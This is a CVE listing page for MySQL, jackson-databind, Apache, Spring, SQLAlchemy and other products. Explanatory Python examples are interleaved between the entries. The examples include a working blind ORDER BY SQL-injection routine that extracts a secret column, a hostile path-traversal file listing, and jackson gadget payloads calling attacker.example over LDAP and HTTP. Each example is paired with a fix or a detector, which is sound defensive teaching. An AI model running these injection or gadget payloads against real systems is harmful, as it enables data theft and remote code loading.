Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Components Services). Supported versions that are affected are 8.0.22 and prior. Difficult to exploit vulnerability allows high privileged attacker with network access via
04-01-2022 - 17:27 20-01-2021 - 15:15
CVE-2021-2028 6.8
Vulnerability in the MySQL Server product of Oracle MySQL (component: InnoDB). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to c
04-01-2022 - 17:27 20-01-2021 - 15:15
CVE-2021-2021 6.8
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.22 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple pro
04-01-2022 - 17:27 20-01-2021 - 15:15
CVE-2021-2016 6.8
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.19 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple pro
04-01-2022 - 17:27 20-01-2021 - 15:15
CVE-2021-2031 6.8
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.22 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple pro
04-01-2022 - 17:27 20-01-2021 - 15:15
CVE-2021-2019 4.0
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Security: Privileges). Supported versions that are affected are 8.0.19 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via m
04-01-2022 - 17:27 20-01-2021 - 15:15
CVE-2021-2036 6.8
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.22 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple pro
04-01-2022 - 17:27 20-01-2021 - 15:15
CVE-2021-2020 6.8
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.20 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple prot
04-01-2022 - 17:27 20-01-2021 - 15:15
CVE-2021-2014 6.8
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: PAM Auth Plugin). Supported versions that are affected are 5.7.32 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multip
04-01-2022 - 17:27 20-01-2021 - 15:15
CVE-2021-2024 6.8
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.22 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple prot
04-01-2022 - 17:27 20-01-2021 - 15:15
CVE-2021-2088 4.9
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: DML). Supported versions that are affected are 8.0.22 and prior. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where MyS
04-01-2022 - 17:09 20-01-2021 - 15:15
CVE-2021-2122 6.8
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: DDL). Supported versions that are affected are 8.0.22 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols
04-01-2022 - 17:09 20-01-2021 - 15:15
CVE-2021-2065 6.8
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.22 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple pro
04-01-2022 - 17:08 20-01-2021 - 15:15
CVE-2021-2061 6.3
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: DDL). Supported versions that are affected are 8.0.22 and prior. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protoco
04-01-2022 - 17:08 20-01-2021 - 15:15
CVE-2021-2087 4.9
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: DML). Supported versions that are affected are 8.0.22 and prior. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where MyS
04-01-2022 - 17:08 20-01-2021 - 15:15
CVE-2021-2076 6.8
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.22 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple pro
04-01-2022 - 17:08 20-01-2021 - 15:15
CVE-2021-2060 6.8
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 5.6.50 and prior, 5.7.32 and prior and 8.0.22 and prior. Easily exploitable vulnerability allows high privileged attack
04-01-2022 - 17:08 20-01-2021 - 15:15
CVE-2021-2081 6.8
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Stored Procedure). Supported versions that are affected are 8.0.22 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multi
04-01-2022 - 17:08 20-01-2021 - 15:15
CVE-2021-2072 6.8
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Stored Procedure). Supported versions that are affected are 8.0.22 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multi
04-01-2022 - 17:08 20-01-2021 - 15:15
CVE-2021-2070 6.8
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.22 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple pro
04-01-2022 - 17:08 20-01-2021 - 15:15
CVE-2020-11998 7.5
A regression has been introduced in the commit preventing JMX re-bind. By passing an empty environment map to RMIConnectorServer, instead of the map that contains the authentication credentials, it leaves ActiveMQ open to the following attack: https:
10-12-2021 - 18:11 10-09-2020 - 19:15
CVE-2020-1967 5.0
Server or client applications that call the SSL_check_chain() function during or after a TLS 1.3 handshake may crash due to a NULL pointer dereference as a result of incorrect handling of the "signature_algorithms_cert" TLS extension. The crash occur
10-12-2021 - 17:11 21-04-2020 - 14:15
CVE-2020-11113 6.8
FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.openjpa.ee.WASRegistryManagedRuntime (aka openjpa).
10-12-2021 - 17:11 31-03-2020 - 05:15
CVE-2020-11111 6.8
FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.activemq.* (aka activemq-jms, activemq-core, activemq-pool, and activemq-pool-jms).
10-12-2021 - 17:10 31-03-2020 - 05:15
CVE-2020-11112 6.8
FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.commons.proxy.provider.remoting.RmiProvider (aka apache/commons-proxy).
10-12-2021 - 17:10 31-03-2020 - 05:15
CVE-2020-10672 6.8
FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.aries.transaction.jms.internal.XaPooledConnectionFactory (aka aries.transaction.jms).
07-12-2021 - 19:44 18-03-2020 - 22:15
CVE-2020-10969 6.8
FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to javax.swing.JEditorPane.
07-12-2021 - 19:43 26-03-2020 - 13:15
CVE-2020-10968 6.8
FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.aoju.bus.proxy.provider.remoting.RmiProvider (aka bus-proxy).
07-12-2021 - 19:43 26-03-2020 - 13:15
CVE-2019-7164 7.5
SQLAlchemy through 1.2.17 and 1.3.x through 1.3.0b2 allows SQL Injection via the order_by parameter.
03-12-2021 - 20:09 20-02-2019 - 00:29
CVE-2020-9546 6.8
FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig (aka shaded hikari-config).
02-12-2021 - 21:22 02-03-2020 - 04:15
CVE-2019-7548 6.8
SQLAlchemy 1.2.17 has SQL Injection when the group_by parameter can be controlled.
30-11-2021 - 19:52 06-02-2019 - 21:29
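The two SQLAlchemy entries above (CVE-2019-7164 and CVE-2019-7548) are one bug class: a request parameter reaching order_by() or group_by() as a plain string, which the affected releases coerced into raw SQL text. The following is an added example, not SQLAlchemy's code, built on the Python standard library's sqlite3 module so it runs without SQLAlchemy installed. The users table, its api_key column and the key values are constructed for the demonstration. It shows why a sort expression is as dangerous as a WHERE clause (the row order becomes a one-bit oracle that reads the secret column character by character) and the column allowlist that closes it.

```python
import sqlite3

# Constructed sample data for the demonstration (not from the page): a users
# table whose api_key column is what the attacker wants to read.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, name TEXT, api_key TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "alice", "k-secret-1"), (2, "bob", "k-secret-2"), (3, "carol", "k-secret-3")],
    )
    return conn

def list_users_vulnerable(conn, order_by):
    """Sort expression taken verbatim from the request. This is the shape of the
    SQLAlchemy bug: a plain string handed to order_by()/group_by() was coerced
    to raw SQL text, so the parameter is part of the statement, not a value."""
    rows = conn.execute(f"SELECT id, name FROM users ORDER BY {order_by}").fetchall()
    return [name for _, name in rows]

def oracle_probe(conn, guess_prefix):
    """Blind injection through ORDER BY: the injected expression returns no data,
    but the row order flips with a condition on the secret, leaking one bit."""
    payload = (
        "CASE WHEN (SELECT api_key FROM users WHERE name = 'alice') "
        f"LIKE '{guess_prefix}%' THEN id ELSE -id END"
    )
    # Ascending by id when the guess is right, by -id (reversed) when it is not.
    return list_users_vulnerable(conn, payload) == ["alice", "bob", "carol"]

def recover_key(conn, alphabet="k-secrt0123456789", max_len=16):
    """Extend the guessed prefix one character at a time until no character
    matches (the key is fully known) or max_len is reached."""
    known = ""
    while len(known) < max_len:
        for ch in alphabet:
            if oracle_probe(conn, known + ch):
                known += ch
                break
        else:
            break
    return known

# The fix: the client may choose a column, never supply SQL. The allowlist is an
# assumption for this demo; in SQLAlchemy terms, hand order_by() a Column object
# or a text() you wrote yourself, never the request string.
ALLOWED_SORT_COLUMNS = {"id", "name"}

def sort_param_is_allowed(value):
    return value in ALLOWED_SORT_COLUMNS

def list_users_safe(conn, order_by, descending=False):
    if not sort_param_is_allowed(order_by):
        raise ValueError(f"unsupported sort column: {order_by!r}")
    direction = "DESC" if descending else "ASC"
    rows = conn.execute(f"SELECT id, name FROM users ORDER BY {order_by} {direction}").fetchall()
    return [name for _, name in rows]

if __name__ == "__main__":
    db = make_db()
    print("recovered via ORDER BY oracle:", recover_key(db))
    print("safe, sorted by name desc:", list_users_safe(db, "name", descending=True))
```

The probe never sees api_key in a result set; it only sees whether alice comes first or last, which is enough to reconstruct the value in a few dozen requests. Any sort, group or column parameter that is interpolated rather than mapped through a fixed allowlist has the same property.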
CVE-2020-14062 6.8
FasterXML jackson-databind 2.x before 2.9.10.5 mishandles the interaction between serialization gadgets and typing, related to com.sun.org.apache.xalan.internal.lib.sql.JNDIConnectionPool (aka xalan2).
17-11-2021 - 20:21 14-06-2020 - 20:15
CVE-2020-14195 6.8
FasterXML jackson-databind 2.x before 2.9.10.5 mishandles the interaction between serialization gadgets and typing, related to org.jsecurity.realm.jndi.JndiRealmFactory (aka org.jsecurity).
17-11-2021 - 20:20 16-06-2020 - 16:15
CVE-2020-14060 6.8
FasterXML jackson-databind 2.x before 2.9.10.5 mishandles the interaction between serialization gadgets and typing, related to oadd.org.apache.xalan.lib.sql.JNDIConnectionPool (aka apache/drill).
17-11-2021 - 20:20 14-06-2020 - 21:15
CVE-2020-14061 6.8
FasterXML jackson-databind 2.x before 2.9.10.5 mishandles the interaction between serialization gadgets and typing, related to oracle.jms.AQjmsQueueConnectionFactory, oracle.jms.AQjmsXATopicConnectionFactory, oracle.jms.AQjmsTopicConnectionFactory, o
17-11-2021 - 16:56 14-06-2020 - 20:15
CVE-2020-10724 2.1
A vulnerability was found in DPDK versions 18.11 and above. The vhost-crypto library code is missing validations for user-supplied values, potentially allowing an information leak through an out-of-bounds memory read.
19-10-2021 - 14:17 19-05-2020 - 19:15
CVE-2020-14147 4.0
An integer overflow in the getnum function in lua_struct.c in Redis before 6.0.3 allows context-dependent attackers with permission to run Lua code in a Redis session to cause a denial of service (memory corruption and application crash) or possibly
30-07-2021 - 13:59 15-06-2020 - 18:15
CVE-2020-11996 5.0
A specially crafted sequence of HTTP/2 requests sent to Apache Tomcat 10.0.0-M1 to 10.0.0-M5, 9.0.0.M1 to 9.0.35 and 8.5.0 to 8.5.55 could trigger high CPU usage for several seconds. If a sufficient number of such requests were made on concurrent HTT
21-07-2021 - 11:39 26-06-2020 - 17:15
CVE-2020-5407 6.5
Spring Security versions 5.2.x prior to 5.2.4 and 5.3.x prior to 5.3.2 contain a signature wrapping vulnerability during SAML response validation. When using the spring-security-saml2-service-provider component, a malicious user can carefully modify
14-06-2021 - 18:15 13-05-2020 - 17:15
CVE-2020-5408 4.0
Spring Security versions 5.3.x prior to 5.3.2, 5.2.x prior to 5.2.4, 5.1.x prior to 5.1.10, 5.0.x prior to 5.0.16 and 4.2.x prior to 4.2.16 use a fixed null initialization vector with CBC Mode in the implementation of the queryable text encryptor. A
14-06-2021 - 18:15 14-05-2020 - 18:15
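CVE-2020-5408 above concerns CBC mode driven with a fixed all-zero IV. The example below is added here and is not Spring Security code: it implements CBC over a toy 8-byte Feistel block cipher (a stand-in so the example runs on the Python standard library alone; it is not a cipher to use) and shows what a constant IV costs. The key and the sample addresses are constructed for the demonstration.

```python
import hashlib
import hmac
import os

BLOCK = 8  # toy block size in bytes; AES uses 16 but the CBC logic is identical

def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def _round_fn(key, i, half):
    # Round function of the toy Feistel cipher: keyed, non-invertible, 4-byte output.
    return hmac.new(key, bytes([i]) + half, hashlib.sha256).digest()[:4]

def block_encrypt(key, block):
    """4-round Feistel permutation over one 8-byte block. Toy stand-in for a real
    block cipher so the example needs no third-party AES; not for real use."""
    l, r = block[:4], block[4:]
    for i in range(4):
        l, r = r, _xor(l, _round_fn(key, i, r))
    return r + l

def block_decrypt(key, block):
    r, l = block[:4], block[4:]
    for i in reversed(range(4)):
        l, r = _xor(r, _round_fn(key, i, l)), l
    return l + r

def pad(data):  # PKCS#7
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n

def unpad(data):
    n = data[-1] if data else 0
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]

def cbc_encrypt(key, iv, plaintext):
    padded, prev, out = pad(plaintext), iv, b""
    for i in range(0, len(padded), BLOCK):
        prev = block_encrypt(key, _xor(padded[i:i + BLOCK], prev))
        out += prev
    return out

def cbc_decrypt(key, iv, ciphertext):
    prev, out = iv, b""
    for i in range(0, len(ciphertext), BLOCK):
        blk = ciphertext[i:i + BLOCK]
        out += _xor(block_decrypt(key, blk), prev)
        prev = blk
    return unpad(out)

NULL_IV = bytes(BLOCK)

def encrypt_fixed_iv(key, plaintext):
    """The weak construction from the advisory: a constant all-zero IV. Nothing
    random enters, so equal inputs give equal outputs and a shared first block
    gives a shared first ciphertext block."""
    return cbc_encrypt(key, NULL_IV, plaintext)

def encrypt_random_iv(key, plaintext):
    """Standard CBC: fresh IV per message, sent in the clear ahead of the body."""
    iv = os.urandom(BLOCK)
    return iv + cbc_encrypt(key, iv, plaintext)

def decrypt_random_iv(key, blob):
    return cbc_decrypt(key, blob[:BLOCK], blob[BLOCK:])

def first_blocks_match(key, a, b):
    """What a database observer learns under the fixed IV without the key:
    whether two stored values begin with the same BLOCK bytes."""
    return encrypt_fixed_iv(key, a)[:BLOCK] == encrypt_fixed_iv(key, b)[:BLOCK]
```

A "queryable" encryptor is deterministic on purpose so an encrypted column can be compared with an equality predicate; the price is exactly the leakage first_blocks_match exposes, plus full equality of every row holding the same value. That trade is only acceptable for fields where an attacker learning "these two rows share a prefix" is harmless, and it must never be reused for free-text secrets.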
CVE-2016-5725 4.3
Directory traversal vulnerability in JCraft JSch before 0.1.54 on Windows, when the mode is ChannelSftp.OVERWRITE, allows remote SFTP servers to write to arbitrary files via a ..\ (dot dot backslash) in a response to a recursive GET command.
14-06-2021 - 18:15 19-01-2017 - 22:59
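CVE-2016-5725 above is a client-side traversal: the SFTP server, not the user, picks the file names during a recursive GET, and a ..\ segment climbs out of the download directory on Windows. The following is an added example, written in Python rather than Java and not JSch's code, of the check a client must apply to every server-supplied name before joining it to the local destination. The local root and the hostile listing are constructed for the demonstration.

```python
import posixpath
import re

_DRIVE = re.compile(r"^[A-Za-z]:")

def safe_local_target(local_root, remote_name):
    """Map a server-supplied file name to a path under local_root, or raise.
    Both '/' and '\\' are treated as separators: the SFTP wire format uses '/',
    but a client on Windows also honours '\\', which is what '..\\' exploits."""
    name = remote_name.replace("\\", "/")
    if name.startswith("/") or _DRIVE.match(name):
        raise ValueError(f"absolute remote name rejected: {remote_name!r}")
    segments = [s for s in name.split("/") if s not in ("", ".")]
    if not segments or any(s == ".." for s in segments):
        raise ValueError(f"traversal in remote name rejected: {remote_name!r}")
    if any("\x00" in s for s in segments):
        raise ValueError(f"NUL byte in remote name rejected: {remote_name!r}")
    return posixpath.join(local_root, *segments)

def recursive_get(local_root, listing):
    """Simulated recursive GET: the server dictates the names, the client must
    not let them escape local_root. Returns ({local path: bytes}, [rejected])."""
    written, rejected = {}, []
    for remote_name, content in listing:
        try:
            target = safe_local_target(local_root, remote_name)
        except ValueError:
            rejected.append(remote_name)
            continue
        written[target] = content
    return written, rejected

# Constructed listing as a hostile server might answer a recursive GET.
MALICIOUS_LISTING = [
    ("docs/readme.txt", b"fine"),
    ("..\\..\\Users\\victim\\Start Menu\\evil.bat", b"payload"),
    ("../../etc/cron.d/evil", b"payload"),
    ("C:\\Windows\\win.ini", b"payload"),
    ("sub/./notes.txt", b"fine"),
]

if __name__ == "__main__":
    ok, bad = recursive_get("C:/downloads", MALICIOUS_LISTING)
    print("written:", sorted(ok))
    print("rejected:", bad)
```

Lexical checks are the first gate, not the last: a real client should also resolve the final path (os.path.realpath) after each write and confirm it is still inside the destination, because a symlink the server delivered earlier in the same recursive GET can redirect a later write even when every name passes this filter.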
CVE-2017-12626 5.0
Apache POI in versions prior to release 3.17 is vulnerable to Denial of Service Attacks: 1) Infinite Loops while parsing crafted WMF, EMF, MSG and macros (POI bugs 61338 and 61294), and 2) Out of Memory Exceptions while parsing crafted DOC, PPT and
14-06-2021 - 18:15 29-01-2018 - 17:29
CVE-2019-10246 5.0
In Eclipse Jetty version 9.2.27, 9.3.26, and 9.4.16, the server running on Windows is vulnerable to exposure of the fully qualified Base Resource directory name on Windows to a remote client when it is configured for showing a Listing of directory co
14-06-2021 - 18:15 22-04-2019 - 20:29
CVE-2020-11984 7.5
Apache HTTP server 2.4.32 to 2.4.44 mod_proxy_uwsgi info disclosure and possible RCE
06-06-2021 - 11:15 07-08-2020 - 16:15
CVE-2020-11993 4.3
Apache HTTP Server versions 2.4.20 to 2.4.43. When trace/debug was enabled for the HTTP/2 module and on certain traffic edge patterns, logging statements were made on the wrong connection, causing concurrent use of memory pools. Configuring the LogLev
06-06-2021 - 11:15 07-08-2020 - 16:15
CVE-2020-11985 4.3
IP address spoofing when proxying using mod_remoteip and mod_rewrite. For configurations using proxying with mod_remoteip and certain mod_rewrite rules, an attacker could spoof their IP address for logging and PHP scripts. Note this issue was fixed in
06-06-2021 - 11:15 07-08-2020 - 16:15
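CVE-2020-11985 above is about which hop an X-Forwarded-For chain is allowed to be believed from. The following is an added example, not httpd or mod_remoteip code, of the trust-boundary walk that header handling has to implement: start from the TCP peer, discard only hops that are known proxies, and stop at the first address nobody we trust vouched for. The proxy ranges and the sample requests are constructed for the demonstration; the naive variant is a generic mistake shown for contrast, not a claim about what the Apache bug did internally.

```python
import ipaddress

# Assumed trusted hops, the equivalent of RemoteIPInternalProxy /
# RemoteIPTrustedProxy in httpd; values are made up for the demo.
TRUSTED_PROXIES = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "192.0.2.10/32")]

def is_trusted_proxy(addr):
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in TRUSTED_PROXIES)

def client_ip(peer_addr, xff_header):
    """Walk X-Forwarded-For right to left, peeling off hops that are our own
    proxies. The first address that is not one of ours is the client; whatever
    sits to its left was written by parties we do not control and is ignored."""
    hops = [h.strip() for h in xff_header.split(",")] if xff_header else []
    hops = [h for h in hops if h]
    current = peer_addr
    while hops and is_trusted_proxy(current):
        candidate = hops.pop()
        try:
            ipaddress.ip_address(candidate)
        except ValueError:
            break  # garbage in the header: stop at the last verified hop
        current = candidate
    return current

def naive_client_ip(peer_addr, xff_header):
    """A common mistake (not a statement about httpd internals): believing the
    leftmost entry, which the client itself can pre-set before any proxy."""
    return xff_header.split(",")[0].strip() if xff_header else peer_addr

# Constructed (TCP peer, X-Forwarded-For as received) pairs.
SAMPLE_REQUESTS = [
    ("10.0.0.5", "203.0.113.9, 10.0.0.7"),       # two trusted hops, honest client
    ("10.0.0.5", "198.51.100.1, 203.0.113.9"),   # client pre-set a fake entry
    ("203.0.113.9", "198.51.100.1"),             # direct hit on origin, header is a lie
    ("10.0.0.5", "not-an-ip, 10.0.0.7"),         # malformed entry
]

if __name__ == "__main__":
    for peer, xff in SAMPLE_REQUESTS:
        print(f"peer={peer:<12} xff={xff!r:<32} client={client_ip(peer, xff)} naive={naive_client_ip(peer, xff)}")
```

The page's entry notes the spoofing only bites in combination with certain mod_rewrite rules; the general rule still holds for any deployment: the address logged or handed to application code must be derived from the verified chain, and the header must be stripped or re-evaluated whenever a request re-enters the server through an internal proxy hop.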
CVE-2020-1935 5.8
In Apache Tomcat 9.0.0.M1 to 9.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99 the HTTP header parsing code used an approach to end-of-line parsing that allowed some invalid HTTP headers to be parsed as valid. This led to a possibility of HTTP Request Smug
04-05-2021 - 19:19 24-02-2020 - 22:15
CVE-2021-2047 7.5
Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core Components). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, and 12.2.1.3.0. Easily exploitable vulnerability allows unauthenticated att
18-03-2021 - 16:32 20-01-2021 - 15:15
CVE-2018-20781 2.1
In pam/gkr-pam-module.c in GNOME Keyring before 3.27.2, the user's password is kept in a session-child process spawned from the LightDM daemon. This can expose the credential in cleartext.
16-03-2021 - 14:02 12-02-2019 - 17:29
CVE-2020-11972 7.5
Apache Camel RabbitMQ enables Java deserialization by default. Apache Camel 2.22.x, 2.23.x, 2.24.x, 2.25.0, 3.0.0 up to 3.1.0 are affected. 2.x users should upgrade to 2.25.1, 3.x users should upgrade to 3.2.0.
15-03-2021 - 22:15 14-05-2020 - 17:15
CVE-2019-0188 5.0
Apache Camel prior to 2.24.0 contains an XML external entity injection (XXE) vulnerability (CWE-611) due to using an outdated vulnerable JSON-lib library. This affects only the camel-xmljson component, which was removed.
15-03-2021 - 18:25 28-05-2019 - 19:29
CVE-2018-11775 5.8
TLS hostname verification when using the Apache ActiveMQ Client before 5.15.6 was missing, which could make the client vulnerable to a MITM attack between a Java application using the ActiveMQ client and the ActiveMQ server. This is now enabled by def
05-03-2021 - 19:15 10-09-2018 - 20:29
CVE-2020-14803 5.0
Vulnerability in the Java SE product of Oracle Java SE (component: Libraries). Supported versions that are affected are Java SE: 11.0.8 and 15. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocol
24-02-2021 - 21:42 21-10-2020 - 15:15
CVE-2020-11620 6.8
FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.commons.jelly.impl.Embedded (aka commons-jelly).
22-02-2021 - 21:33 07-04-2020 - 23:15
CVE-2020-11619 6.8
FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.springframework.aop.config.MethodLocatingFactoryBean (aka spring-aop).
22-02-2021 - 21:29 07-04-2020 - 23:15
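The jackson-databind entries above (CVE-2020-11113, -11111, -11112, -10672, -10969, -10968, -9546, -14062, -14195, -14060, -14061, -11620 and -11619) each name one more class that becomes dangerous when default typing lets a JSON document choose the Java class to instantiate. Default typing puts the class name on the wire either as the two-element wrapper array ["fqcn", {...}] or as an "@class" property. The following is an added example, not Jackson's code: a scanner for inbound JSON bodies that finds every place such a type hint could be read and flags the classes this page lists. The sample body is constructed; the only class names in it are the gadgets named above plus one made-up class in the org.apache.activemq package to exercise the prefix rule.

```python
import json

# Gadget classes named in the jackson-databind entries on this page.
KNOWN_GADGETS = {
    "org.apache.openjpa.ee.WASRegistryManagedRuntime",
    "org.apache.commons.proxy.provider.remoting.RmiProvider",
    "org.apache.aries.transaction.jms.internal.XaPooledConnectionFactory",
    "javax.swing.JEditorPane",
    "org.aoju.bus.proxy.provider.remoting.RmiProvider",
    "org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig",
    "com.sun.org.apache.xalan.internal.lib.sql.JNDIConnectionPool",
    "org.jsecurity.realm.jndi.JndiRealmFactory",
    "oadd.org.apache.xalan.lib.sql.JNDIConnectionPool",
    "oracle.jms.AQjmsQueueConnectionFactory",
    "oracle.jms.AQjmsXATopicConnectionFactory",
    "oracle.jms.AQjmsTopicConnectionFactory",
    "org.apache.commons.jelly.impl.Embedded",
    "org.springframework.aop.config.MethodLocatingFactoryBean",
}
# Package families the page lists as a whole (CVE-2020-11111, CVE-2020-14061).
GADGET_PREFIXES = ("org.apache.activemq.", "oracle.jms.")

def looks_like_class_name(value):
    """A dotted Java binary name; '$' is allowed for nested classes."""
    if not isinstance(value, str) or "." not in value:
        return False
    return all(part.replace("$", "_").isidentifier() for part in value.split("."))

def find_type_hints(node, path="$"):
    """Yield (json_path, class_name) wherever default typing could read a class:
    the ["fqcn", {...}] wrapper-array form, or an "@class" property."""
    if isinstance(node, list):
        if len(node) == 2 and looks_like_class_name(node[0]) and isinstance(node[1], dict):
            yield path, node[0]
        for i, item in enumerate(node):
            yield from find_type_hints(item, f"{path}[{i}]")
    elif isinstance(node, dict):
        if looks_like_class_name(node.get("@class")):
            yield path, node["@class"]
        for key, value in node.items():
            yield from find_type_hints(value, f"{path}.{key}")

def scan(body):
    """Return (path, class, verdict) for every type hint in a JSON body.
    Unknown class names are reported too: a denylist only catches what is
    already public, so any hint in a body that should not carry one is a finding."""
    findings = []
    for path, cls in find_type_hints(json.loads(body)):
        if cls in KNOWN_GADGETS:
            findings.append((path, cls, "known-gadget"))
        elif cls.startswith(GADGET_PREFIXES):
            findings.append((path, cls, "gadget-family"))
        else:
            findings.append((path, cls, "unexpected-type-hint"))
    return findings

# Constructed request body, not a real capture. "ActiveMQSampleFactory" is a
# made-up class name used only to exercise the package-prefix rule.
SAMPLE_BODY = json.dumps({
    "user": "alice",
    "settings": ["com.sun.org.apache.xalan.internal.lib.sql.JNDIConnectionPool",
                 {"jndiPath": "ldap://attacker.example/x"}],
    "ref": {"@class": "javax.swing.JEditorPane", "page": "http://attacker.example/"},
    "conn": ["org.apache.activemq.ActiveMQSampleFactory", {"brokerURL": "tcp://attacker.example:61616"}],
    "tags": ["a.b", "c"],
})

if __name__ == "__main__":
    for path, cls, verdict in scan(SAMPLE_BODY):
        print(f"{verdict:<22} {path:<12} {cls}")
```

The "tags" entry shows the false-positive guard: a two-element array whose second element is not an object is ordinary data, not a type hint. The scanner is a detection aid for logs and gateways, not the fix; the fix the entries describe is upgrading to 2.9.10.4 or 2.9.10.5 as applicable, and more durably not enabling default typing on untrusted input at all (Jackson 2.10 and later require an explicit PolymorphicTypeValidator allowlist through activateDefaultTyping).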
CVE-2020-26575 5.0
In Wireshark through 3.2.7, the Facebook Zero Protocol (aka FBZERO) dissector could enter an infinite loop. This was addressed in epan/dissectors/packet-fbzero.c by correcting the implementation of offset advancement.
11-02-2021 - 14:48 06-10-2020 - 15:15
CVE-2020-25863 5.0
In Wireshark 3.2.0 to 3.2.6, 3.0.0 to 3.0.13, and 2.6.0 to 2.6.20, the MIME Multipart dissector could crash. This was addressed in epan/dissectors/packet-multipart.c by correcting the deallocation of invalid MIME parts.
10-02-2021 - 20:22 06-10-2020 - 15:15
CVE-2020-25862 5.0
In Wireshark 3.2.0 to 3.2.6, 3.0.0 to 3.0.13, and 2.6.0 to 2.6.20, the TCP dissector could crash. This was addressed in epan/dissectors/packet-tcp.c by changing the handling of the invalid 0xFFFF checksum.
10-02-2021 - 20:20 06-10-2020 - 15:15
CVE-2017-5611 7.5
SQL injection vulnerability in wp-includes/class-wp-query.php in WP_Query in WordPress before 4.7.2 allows remote attackers to execute arbitrary SQL commands by leveraging the presence of an affected plugin or theme that mishandles a crafted post typ
30-01-2021 - 02:37 30-01-2017 - 04:59
CVE-2018-2587 5.8
Vulnerability in the Oracle Access Manager component of Oracle Fusion Middleware (subcomponent: Web Server Plugin). Supported versions that are affected are 10.1.4.3.0, 11.1.2.3.0 and 12.2.1.3.0. Difficult to exploit vulnerability allows unauthentica
30-01-2021 - 02:37 19-04-2018 - 02:29
CVE-2018-7318 7.5
SQL Injection exists in the CheckList 1.1.1 component for Joomla! via the title_search, tag_search, name_search, description_search, or filter_order parameter.
30-01-2021 - 02:37 22-02-2018 - 19:29
CVE-2019-3778 6.4
Spring Security OAuth, versions 2.3 prior to 2.3.5, and 2.2 prior to 2.2.4, and 2.1 prior to 2.1.4, and 2.0 prior to 2.0.17, and older unsupported versions could be susceptible to an open redirector attack that can leak an authorization code. A malic
30-01-2021 - 02:36 07-03-2019 - 18:29
CVE-2018-9019 7.5
SQL Injection vulnerability in Dolibarr before version 7.0.2 allows remote attackers to execute arbitrary SQL commands via the sortfield parameter to /accountancy/admin/accountmodel.php, /accountancy/admin/categories_list.php, /accountancy/admin/jour
30-01-2021 - 02:36 22-05-2018 - 20:29
CVE-2019-11269 5.8
Spring Security OAuth versions 2.3 prior to 2.3.6, 2.2 prior to 2.2.5, 2.1 prior to 2.1.5, and 2.0 prior to 2.0.18, as well as older unsupported versions could be susceptible to an open redirector attack that can leak an authorization code. A malicio
30-01-2021 - 02:36 12-06-2019 - 15:29
CVE-2021-2125 3.6
